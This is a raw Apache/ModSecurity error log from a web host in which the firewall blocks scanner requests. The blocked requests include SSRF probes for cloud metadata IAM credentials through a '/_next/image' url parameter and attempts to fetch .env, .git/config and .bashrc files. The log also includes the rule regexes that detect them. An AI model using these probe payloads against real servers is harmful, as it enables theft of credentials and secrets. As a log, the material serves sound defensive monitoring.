[Mon May 11 19:11:46.924399 2026] [security2:error] [pid 1501883:tid 1501893] [client 45.148.10.249:10846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/_next/image"] [unique_id "agIN0jP5Q_-MBliRCAxCawAAAAg"]
[Mon May 11 19:11:46.924586 2026] [security2:error] [pid 1501883:tid 1501893] [client 45.148.10.249:10846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0jP5Q_-MBliRCAxCawAAAAg"]
[Mon May 11 19:11:47.032469 2026] [security2:error] [pid 1501831:tid 1501842] [client 45.148.10.249:10946] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "habilis.space"] [uri "/_next/image/"] [unique_id "agIN01NddpkriGUb6ZVRkAAAAQk"]
[Mon May 11 19:11:47.033131 2026] [security2:error] [pid 1501831:tid 1501842] [client 45.148.10.249:10946] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/_next/image/"] [unique_id "agIN01NddpkriGUb6ZVRkAAAAQk"]
[Mon May 11 19:11:47.033339 2026] [security2:error] [pid 1501831:tid 1501842] [client 45.148.10.249:10946] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN01NddpkriGUb6ZVRkAAAAQk"]
[Mon May 11 19:11:47.052292 2026] [security2:error] [pid 1501831:tid 1501842] [client 45.148.10.249:10946] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "habilis.space"] [uri "/_next/image/"] [unique_id "agIN01NddpkriGUb6ZVRlAAAAQk"]
[Mon May 11 19:11:47.052903 2026] [security2:error] [pid 1501831:tid 1501842] [client 45.148.10.249:10946] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/_next/image/"] [unique_id "agIN01NddpkriGUb6ZVRlAAAAQk"]
[Mon May 11 19:11:47.053085 2026] [security2:error] [pid 1501831:tid 1501842] [client 45.148.10.249:10946] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN01NddpkriGUb6ZVRlAAAAQk"]
[Mon May 11 19:11:47.185410 2026] [security2:error] [pid 1501831:tid 1501841] [client 45.148.10.249:10912] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env"] [unique_id "agIN01NddpkriGUb6ZVRnAAAAQg"]
[Mon May 11 19:11:47.185596 2026] [security2:error] [pid 1501831:tid 1501841] [client 45.148.10.249:10912] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env"] [unique_id "agIN01NddpkriGUb6ZVRnAAAAQg"]
[Mon May 11 19:11:47.185800 2026] [security2:error] [pid 1501831:tid 1501841] [client 45.148.10.249:10912] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN01NddpkriGUb6ZVRnAAAAQg"]
[Mon May 11 19:11:47.203795 2026] [security2:error] [pid 1501831:tid 1501841] [client 45.148.10.249:10912] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.local"] [unique_id "agIN01NddpkriGUb6ZVRngAAAQg"]
[Mon May 11 19:11:47.203981 2026] [security2:error] [pid 1501831:tid 1501841] [client 45.148.10.249:10912] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.local"] [unique_id "agIN01NddpkriGUb6ZVRngAAAQg"]
[Mon May 11 19:11:47.204226 2026] [security2:error] [pid 1501831:tid 1501841] [client 45.148.10.249:10912] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN01NddpkriGUb6ZVRngAAAQg"]
[Mon May 11 19:11:47.504034 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env"] [unique_id "agIN01NddpkriGUb6ZVRpQAAARc"]
[Mon May 11 19:11:47.504230 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env"] [unique_id "agIN01NddpkriGUb6ZVRpQAAARc"]
[Mon May 11 19:11:47.504446 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN01NddpkriGUb6ZVRpQAAARc"]
[Mon May 11 19:11:47.522179 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env"] [unique_id "agIN01NddpkriGUb6ZVRqAAAARc"]
[Mon May 11 19:11:47.522365 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env"] [unique_id "agIN01NddpkriGUb6ZVRqAAAARc"]
[Mon May 11 19:11:47.522589 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN01NddpkriGUb6ZVRqAAAARc"]
[Mon May 11 19:11:47.539994 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/api/.env"] [unique_id "agIN01NddpkriGUb6ZVRqQAAARc"]
[Mon May 11 19:11:47.540198 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/api/.env"] [unique_id "agIN01NddpkriGUb6ZVRqQAAARc"]
[Mon May 11 19:11:47.540402 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN01NddpkriGUb6ZVRqQAAARc"]
[Mon May 11 19:11:47.559554 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/api/.env"] [unique_id "agIN01NddpkriGUb6ZVRqgAAARc"]
[Mon May 11 19:11:47.559796 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/api/.env"] [unique_id "agIN01NddpkriGUb6ZVRqgAAARc"]
[Mon May 11 19:11:47.560069 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN01NddpkriGUb6ZVRqgAAARc"]
[Mon May 11 19:11:51.451513 2026] [security2:error] [pid 1501831:tid 1501837] [client 43.131.36.84:46418] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.of-crystal-lake.net"] [uri "/"] [unique_id "agIN11NddpkriGUb6ZVRtwAAAQQ"]
[Mon May 11 19:12:52.691152 2026] [security2:error] [pid 1501831:tid 1501847] [client 43.156.168.214:34024] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/envie-de-savoir/"] [unique_id "agIOFFNddpkriGUb6ZVSogAAAQ4"]
[Mon May 11 19:13:38.669475 2026] [security2:error] [pid 1501831:tid 1501834] [client 34.116.255.65:60270] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.git/config"] [unique_id "agIOQlNddpkriGUb6ZVS6gAAAQE"]
[Mon May 11 19:13:38.669850 2026] [security2:error] [pid 1501831:tid 1501834] [client 34.116.255.65:60270] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.git/config"] [unique_id "agIOQlNddpkriGUb6ZVS6gAAAQE"]
[Mon May 11 19:13:38.674009 2026] [core:error] [pid 1501831:tid 1501834] [client 34.116.255.65:60270] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:13:38.674577 2026] [security2:error] [pid 1501831:tid 1501834] [client 34.116.255.65:60270] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.git/config"] [unique_id "agIOQlNddpkriGUb6ZVS6gAAAQE"]
[Mon May 11 19:13:41.118262 2026] [security2:error] [pid 1501831:tid 1501856] [client 216.73.216.110:62716] ModSecurity: Warning. Matched phrase ".bashrc" at ARGS:edit. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bashrc found within ARGS:edit: .bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/index.php"] [unique_id "agIORVNddpkriGUb6ZVS8wAAARc"]
[Mon May 11 19:13:41.118999 2026] [security2:error] [pid 1501831:tid 1501856] [client 216.73.216.110:62716] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/index.php"] [unique_id "agIORVNddpkriGUb6ZVS8wAAARc"]
[Mon May 11 19:13:41.216533 2026] [security2:error] [pid 1501831:tid 1501856] [client 216.73.216.110:62716] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIORVNddpkriGUb6ZVS8wAAARc"]
[Mon May 11 19:14:03.560344 2026] [core:error] [pid 1424905:tid 1424927] [client 52.172.142.96:7571] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:03.560470 2026] [core:error] [pid 1424905:tid 1424927] [client 52.172.142.96:7571] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:03.952487 2026] [core:error] [pid 1511173:tid 1511187] [client 52.172.142.96:6679] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:03.952522 2026] [core:error] [pid 1511173:tid 1511187] [client 52.172.142.96:6679] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:04.339873 2026] [core:error] [pid 1424905:tid 1424916] [client 52.172.142.96:6172] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:04.339910 2026] [core:error] [pid 1424905:tid 1424916] [client 52.172.142.96:6172] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:04.976397 2026] [core:error] [pid 1501831:tid 1501834] [client 52.172.142.96:6698] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:04.976432 2026] [core:error] [pid 1501831:tid 1501834] [client 52.172.142.96:6698] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:05.378941 2026] [core:error] [pid 1501883:tid 1501907] [client 52.172.142.96:6191] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:05.379193 2026] [core:error] [pid 1501883:tid 1501907] [client 52.172.142.96:6191] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:05.990718 2026] [core:error] [pid 1502013:tid 1502050] [client 52.172.142.96:6684] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:05.990763 2026] [core:error] [pid 1502013:tid 1502050] [client 52.172.142.96:6684] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:06.402802 2026] [core:error] [pid 1501831:tid 1501852] [client 52.172.142.96:6239] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:06.402839 2026] [core:error] [pid 1501831:tid 1501852] [client 52.172.142.96:6239] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:06.902910 2026] [core:error] [pid 1501883:tid 1501900] [client 52.172.142.96:6162] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:06.902948 2026] [core:error] [pid 1501883:tid 1501900] [client 52.172.142.96:6162] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
